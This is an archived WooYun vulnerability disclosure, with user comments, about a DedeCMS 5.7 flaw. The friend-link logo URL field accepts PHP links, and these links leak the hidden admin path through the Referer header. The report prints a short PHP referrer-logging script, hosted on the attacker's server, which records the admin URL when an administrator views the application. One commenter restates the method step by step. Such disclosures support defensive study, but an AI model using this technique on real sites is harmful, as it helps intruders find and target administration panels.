当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(128) 关注此漏洞

缺陷编号: WooYun-2014-76556

漏洞标题: 织梦某处设计缺陷导致后台地址泄露

相关厂商: Dedecms

漏洞作者: MuZhU0

提交时间: 2014-09-19 14:26

公开时间: 2014-12-15 14:28

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 逻辑错误 设计不当

26人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-11-18: 细节向核心白帽子及相关领域专家公开
2014-11-28: 细节向普通白帽子公开
2014-12-08: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

某处设计缺陷,程序对某些东西过滤不严,导致后台地址泄露,仅测试了5.7。目测其它版本同样存在问题。

详细说明:

QQ截图20140918214426.png





DEDECMS对友情链接申请的LOGO地址没有进行严格的判断和过滤,导致可以提交PHP、ASP等后缀。

且后台查看友情链接时,如下图所示,图片仍是申请时提交的URL。



QQ截图20140918214426.png





X.PHP 代码:



<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("x.jpg");

imagejpeg($img);

imagedestroy($img);

?>



当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。



QQ截图20140918214426.png

漏洞证明:

QQ截图20140918214426.png





X.PHP 代码:



<?php

file_put_contents('x.txt',$_SERVER['HTTP_REFERER']);

header("Content-type:image/jpeg");

$img=imagecreatefromjpeg("x.jpg");

imagejpeg($img);

imagedestroy($img);

?>



当访问该文件,获取$_SERVER['HTTP_REFERER'],并且写出文件到X.TXT。



QQ截图20140918214426.png

修复方案:

应该都明白的,我就不献丑了。

版权声明:转载请注明来源 MuZhU0@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-15 14:28

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2014-09-19 14:27 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
    0

    刘明~!

  2. 2014-09-19 14:38 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    这个好!

  3. 2014-09-19 15:15 | 赈早见琥珀主 ( 实习白帽子 | Rank:37 漏洞数:5 )
    0

    目测要火

  4. 2014-09-19 15:21 | U神 ( 核心白帽子 | Rank:1360 漏洞数:150 | 乌云核心菜鸟,联盟托管此号中,欢迎加入08...)
    0

    最需要的就是这个玩意了!

  5. 2014-09-19 15:30 | Safe ( 路人 | Rank:0 漏洞数:1 | 一个平凡的人)
    0

    有这个BUG,妈妈再也不用担心你找不到后台了

  6. 2014-09-19 15:31 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)
    0

    我去,这个威力略大

  7. 2014-09-19 15:56 | Walle ( 路人 | Rank:0 漏洞数:5 | ... 位卑、未敢忘忧国! ...)
    0

    哈哈!!!!!

  8. 2014-09-19 16:15 | Grayon ( 路人 | Rank:4 漏洞数:4 | 今天怎么不开心 :‮)
    0

    我喜欢这个

  9. 2014-09-20 07:49 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖,不如相濡以沫)
    0

    卧槽

  10. 2014-09-22 10:22 | menmen519 ( 普通白帽子 | Rank:914 漏洞数:161 | http://menmen519.blog.sohu.com/)
    0

    这个给力,一直是个头痛的问题

  11. 2014-09-23 20:18 | Azui ( 实习白帽子 | Rank:61 漏洞数:15 | 人有两件宝,双手和大脑。)
    0

    这个比较屌

  12. 2014-09-25 10:50 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    0

    为毛还不公开

  13. 2014-09-25 10:50 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    0

    @MuZhU0 直接漏点吧,不用怕我们会LJ你的。放心我们都不是什么好人

  14. 2014-09-25 17:54 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
    0

    @微尘 哈哈哈,这个东西其实非常鸡肋。

  15. 2014-09-26 09:01 | 发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)
    0

    别是日志就行。。

  16. 2014-09-26 14:04 | emeditor ( 路人 | Rank:2 漏洞数:1 | 过来乌云学习 求大神别黑)
    0

    这个必须能火…

  17. 2014-09-26 20:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )
    0

    哈哈 幸亏厂商无良...

  18. 2014-09-26 22:09 | 风情万种 ( 普通白帽子 | Rank:195 漏洞数:66 | 不再相信爱了)
    0

    我喜欢!

  19. 2014-09-27 10:56 | lck丶 ( 路人 | Rank:6 漏洞数:2 | 求大牛拿0day砸死)
    0

    卧槽

  20. 2014-09-27 14:33 | 微尘 ( 普通白帽子 | Rank:226 漏洞数:76 )
    0

    @MuZhU0 不是那个日志吧?求漏电有木有

  21. 2014-09-27 18:09 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
    0

    @微尘 既然忽略了,就说了吧。友情链接申请哪里可以提交PHP文件,管理员后台看友情链接申请的时候,PHP获取来源页就行了。

  22. 2014-09-27 18:16 | 风情万种 ( 普通白帽子 | Rank:195 漏洞数:66 | 不再相信爱了)
    0

    @MuZhU0 这样子的哇!有点鸡肋啊

  23. 2014-09-27 20:45 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
    0

    @风情万种 是哇,鸡肋。

  24. 2014-09-27 20:50 | Azui ( 实习白帽子 | Rank:61 漏洞数:15 | 人有两件宝,双手和大脑。)
    0

    @MuZhU0 我记得之前就有人发过 通过流量统计那边查看管理员访问的链接,原理一样,鸡肋- -。

  25. 2014-10-02 21:21 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)
    0

    必须会火,求关注

  26. 2014-10-11 14:37 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    0

    需要交互嘛~~

  27. 2014-10-11 15:57 | 0x334 ( 普通白帽子 | Rank:181 漏洞数:39 | 漏洞无影响,已忽略~~~~~~~)
    0

    利用确实有点鸡肋

  28. 2014-10-13 14:32 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)
    0

    referer一直是个让人不省心的的东西啊

  29. 2014-10-14 11:25 | chowner ( 路人 | Rank:4 漏洞数:2 | 运维工程师 兼职搞安全)
    0

    referer,难怪被忽略,还需要交互。。

  30. 2014-12-15 14:37 | 老黑 ( 普通白帽子 | Rank:175 漏洞数:66 | 最爱红颜不老。)
    1

    图片也可以查看REFFER啊 为什么一定要ASP PHP呢

  31. 2014-12-15 17:46 | MuZhU0 ( 路人 | Rank:6 漏洞数:4 )
    1

    @老黑 PHP写出文件不是更方便嘛。

  32. 2014-12-24 17:47 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
    1

    x.txt ? 本地 还是 目标站?

  33. 2014-12-25 08:58 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)
    1

    x.txt 是写入到根目录还是哪里...楼主

  34. 2015-01-17 10:22 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)
    1

    @带我玩 是自己本地的,试下就知道了

  35. 2015-01-17 10:22 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)
    1

    @Mxx 是自己本地的,试下就知道了

  36. 2015-01-18 15:34 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
    1

    @Sofia 测试跳转到后台?

  37. 2015-01-18 16:11 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)
    1

    @Mxx 这个很简单啊,就是远程链接一个自己服务器的php文件,管理访问后台那个地方的时候就会加载这个php,然后自己这个php文件同目录会生成x.txt文件,里面记录了referer,就是后台路径

  38. 2015-01-19 14:36 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
    0

    @Sofia 我懂了,谢了。

  39. 2015-01-22 15:24 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)
    0

    这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer

  40. 2015-08-05 23:07 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)
    0

    这个没用啊,就算后缀是图片的,服务器是我控制的,依然可以抓到referer

  41. 2015-08-24 14:57 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )
    0

    大爱

登录后才能发表评论,请先 登录